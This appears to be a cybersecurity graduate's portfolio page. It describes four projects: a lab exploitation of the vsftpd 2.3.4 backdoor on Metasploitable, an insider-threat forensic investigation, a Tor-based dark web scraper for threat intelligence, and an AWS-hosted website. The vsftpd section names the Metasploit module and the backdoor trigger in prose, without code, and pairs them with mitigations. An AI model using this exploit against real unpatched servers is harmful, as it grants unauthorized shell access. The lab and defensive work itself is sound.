My name is Thomas Biryla and I am a recent graduate from Marist University. I received my Bachelor of Science in Cyber Security as well as a triple minor in Information Technology, Informations Systems and Computer Science. While attending Marist University I was the president and captain of the Men's Club Volleyball team where I was able to learn a lot about what it takes to run a team from a leadership position as well as balancing the logistics of things such as our budget to ensure the team's continued success. I also like to research and experiment with different skills in the technology field that I find online or come across as a result of a project I am working on.
During this project, I was assigned a virtual lab environment consisting of two VMs hosted in VMware: an attack box (running Kali Linux) and a defense box hosting Metasploitable 2, a purposely vulnerable Linux-based system used for penetration testing practice. My objective was to perform a controlled exploitation against a known vulnerable service and analyze both the attack vector and potential mitigation strategies. I chose to investigate the vsftpd 2.3.4 backdoor exploit, a well-documented vulnerability present in Metasploitable. This version of vsftpd (Very Secure FTP Daemon) contains a deliberately inserted backdoor that activates when a client attempts to log in with a username containing a smiley face :). If triggered, the service opens a shell on port 6200, granting the attacker unauthorized remote access to the system — a clear violation of security best practices. Using the Metasploit Framework within Kali Linux, I launched the exploit by setting up the appropriate module (exploit/unix/ftp/vsftpd_234_backdoor) and targeting the Metasploitable IP address. Upon successful exploitation, I was able to gain a remote shell, demonstrating how easily such a vulnerability could be abused in a real-world scenario if left unpatched. As part of the defensive analysis, I explored multiple methods for mitigating the risk posed by such FTP-related vulnerabilities. The most direct mitigation I applied was to disable the FTP service entirely, especially in environments where it is not essential. I then recommended switching to SFTP (SSH File Transfer Protocol), which is built on the secure SSH protocol and provides encrypted file transfers — a significant improvement over plain-text FTP. However, my research also revealed that simply disabling a service isn’t always practical in production environments. Other mitigation strategies include: Using firewalls to restrict access to FTP ports, implementing intrusion detection systems (IDS) to monitor for unusual login attempts, updating or replacing outdated software with secure, actively maintained alternatives as well as hardening configurations, such as disabling anonymous access and enforcing strong authentication. This project helped reinforce my understanding of how vulnerable services can be exploited and, more importantly, how layered security and proactive system hardening are necessary to protect real-world systems from similar threats.
During this project, I worked collaboratively as part of a four-person digital forensics team tasked with investigating a simulated insider threat scenario within a fictional organization. Our objective was to determine whether a suspected employee had intentionally leaked sensitive company data. To ensure the integrity of our investigation, we began by creating a forensically sound image of the suspect’s workstation using industry-standard tools such as FTK Imager and Autopsy. This process allowed us to preserve digital evidence in a manner that would be admissible in a real-world legal context.Once the image was secured, we conducted a thorough forensic analysis of the system. This included reviewing system logs, browsing history, recent file access activity, USB device usage, and any encrypted or deleted files. We also searched for the presence of unauthorized software or communications with external storage or email platforms. Throughout the investigation, we followed a structured workflow aligned with digital forensic methodologies, ensuring chain of custody and documentation at every step. Our findings were compiled into a comprehensive forensic report detailing the evidence collected, the tools and techniques used, and our conclusions based on the digital artifacts recovered. This report demonstrated that the suspect had indeed accessed and transferred confidential information without authorization, supporting the insider threat hypothesis. The project not only enhanced my technical skills in digital forensics but also emphasized the importance of teamwork, meticulous documentation, and adherence to legal and ethical standards in cybersecurity investigations.
I was in a 4 person team and led the design, development, and deployment of a custom dark web scraping tool designed to systematically extract user-generated content from three selected darknet forums and marketplaces. The tool was tailored specifically for environments hosted on the Tor network, which required the use of Tor proxy integration (e.g., routing traffic through 127.0.0.1:9050) to access .onion addresses safely and anonymously. To handle the unique structure and frequent instability of darknet sites, we implemented resilient scraping logic capable of navigating dynamic or inconsistently formatted HTML and handling common challenges such as CAPTCHA interruptions, session expirations, and site takedowns. The tool was primarily built using Python, leveraging libraries such as BeautifulSoup and Requests (via SOCKS5 proxy), and in some cases, Selenium for pages requiring JavaScript rendering. Scraped data included usernames, post content, timestamps, thread titles, and marketplace listings. To support long-term use, we added features such as structured JSON or CSV output for easy integration into existing security workflows. All scraped data was stored in a secure local database and analyzed using basic natural language processing (NLP) techniques to identify relevant threat indicators, such as keyword matching for malware, credential dumps, or illicit financial services. This tool became a key asset for a broader cyber threat intelligence (CTI) initiative, enabling continuous and automated monitoring of high-risk darknet platforms. It allowed analysts to identify emerging cyber threats, track malicious actor behavior, and correlate activity across forums to support potential attribution. The project not only demonstrated technical proficiency in web scraping and secure networking but also required strong knowledge of threat intelligence operations, data privacy considerations, and the ethical boundaries of operating in dark web environments.
As a personal project, I created and hosted a fully functional website on the AWS cloud platform. The process began with learning how to design and build a website from the ground up using HTML, CSS, and JavaScript. I used HTML to structure the content of the website, CSS to style the layout and visual appearance, and JavaScript to add interactivity such as responsive menus and dynamic content. Since I was teaching myself as I built the site, I relied heavily on online resources including FreeCodeCamp, W3Schools, YouTube tutorials, and technical forums like Stack Overflow. These platforms helped me understand the fundamentals of front-end development and troubleshoot issues along the way. Once the website was built and tested locally, I moved on to hosting it on Amazon Web Services (AWS). I began by creating an S3 (Simple Storage Service) bucket, where I uploaded my static site files including the HTML, CSS, and JavaScript files, along with any images or assets. I enabled static website hosting within the S3 bucket settings and set the proper permissions to make the content publicly accessible. This allowed AWS to serve the website directly to users as a static site. To connect the site to a custom domain, I used AWS Route 53, which is a scalable Domain Name System (DNS) service. I registered a domain through Route 53 and created a hosted zone to manage the DNS settings. I then configured the DNS records, specifically pointing the domain’s A record to the S3 bucket’s website endpoint, enabling users to access my site through a personalized domain name. To ensure proper access and security, I also configured AWS Identity and Access Management (IAM) roles and policies, which allowed me to control who had access to manage or view the S3 bucket and other AWS resources involved in the project. This project taught me how to code, deploy, and manage a live website independently. It significantly improved my understanding of both front-end development and cloud infrastructure, as I not only built the site from scratch but also learned how to navigate and leverage key AWS services such as S3, Route 53, and IAM through hands-on practice and online research.